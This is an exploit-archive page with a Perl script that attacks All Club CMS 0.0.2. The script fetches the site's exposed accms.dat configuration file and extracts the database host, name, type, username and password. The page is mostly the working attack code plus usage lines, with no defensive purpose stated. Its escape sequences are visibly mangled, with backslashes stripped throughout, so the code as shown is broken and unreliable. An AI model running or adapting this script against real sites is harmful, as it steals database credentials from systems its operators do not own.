[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : All Club CMS <= 0.0.2 Remote DB Config Retrieve Exploit
# Published : 2008-11-28
# Author : StAkeR
# Previous Title : Web Calendar System <= 3.40 (XSS/SQL) Multiple Remote Vulnerabilities
# Next Title : SailPlanner 0.3a (Auth Bypass) SQL Injection Vulnerability


#!/usr/bin/perl 

=about

 All Club CMS <= 0.0.2 Remote DB Config Retrieve Exploit
 -------------------------------------------------------
 by athos - staker[at]hotmail[dot]it
 download on http://sourceforge.net
 -------------------------------------------------------
 Usage: perl exploit.pl localhost/cms [MODE]
        perl exploit.pl localhost/cms all 
        perl exploit.pl localhost/cms default    
 -------------------------------------------------------
 NOTE: Don't add me on MSN Messenger
                

=cut

use strict;
use warnings;
use IO::Socket;
use LWP::UserAgent;

my (@conf,$result);

my $host = shift;
my $path = shift;
my $mode = shift or &usage;
my @data = split /=s/,dbconfig();

die "Exploit Failed!n" unless(join('',@data) =~ /DB_PASS/i);

if($mode =~ /all/i)
{
   my $http = new LWP::UserAgent(
                                  agent   => 'Lynx (textmode)',
                                  timeout => 5,
                                ) or die $!;  
                              
   my $send = $http->get("http://${host}/${path}/accms.dat");
   
   if($send->is_success)
   {
      print STDOUT $send->content;
      exit;
   }
   else
   {
      print STDERR $send->status_line;
      exit;
   }
}


if($mode =~ /default/i)
{
   $data[9] =~ s/s//;      # password
   $data[8] =~ s/DB_PASS//; # username
   $data[7] =~ s/DB_USER//; # db host
   $data[6] =~ s/DB_HOST//; # db name
   $data[5] =~ s/DEF_DB//;  # db type

   @conf = (
             'dbhost:'   => $data[7],
             'dbname:'   => $data[6],
             'dbtype:'   => $data[5],
             'username:' => $data[8],
             'password:' => $data[9],
          );                

   foreach(@conf)
   {
      $result .= $_;
   }       

   my $content = join '',split / /,$result;

   if($content =~ /(dbhost|dbname|dbtype|username|password)/i)
   {
      print STDOUT "[-] Exploit Successfully!n";
      print STDOUT $content;
      exit; 
   }
   else
   {
      print STDOUT "[-] Exploit Failed!n";
      print STDOUT "[-] by athos - staker[at]hotmail[dot]itn";
      exit;
   }  
}


sub dbconfig
{
   my $html;
   my $sock = new IO::Socket::INET(
                                    PeerAddr => $host,
                                    PeerPort => 80,
                                    Proto    => 'tcp',
                                  ) or die $!;
                                  
                                     
   my $data = "GET /$path/accms.dat HTTP/1.1rn".
              "Host: $hostrn".
              "User-Agent: Lynx (textmode)rn".
              "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8rn".
              "Accept-Language: en-us,en;q=0.5rn".
              "Accept-Encoding: text/plainrn".
              "Connection: closernrn";
              
   $sock->send($data);
  
   while(<$sock>) 
   { 
      $html .= $_; 
   }  return $html if $html =~ m{HTTP/1.1 200 OK};            
}   
   
   
   
sub usage
{
   print STDOUT "[-] All Club CMS <= 0.0.2 Remote DB Config Retrieve Exploitn";
   print STDOUT "[-] Usage: perl $0 [host] [path] [mode]n";
   print STDOUT "           perl $0 localhost /cms alln";
   print STDOUT "           perl $0 localhost /cms defaultn"; 
   exit;
}  

# www.Syue.com [2008-11-28]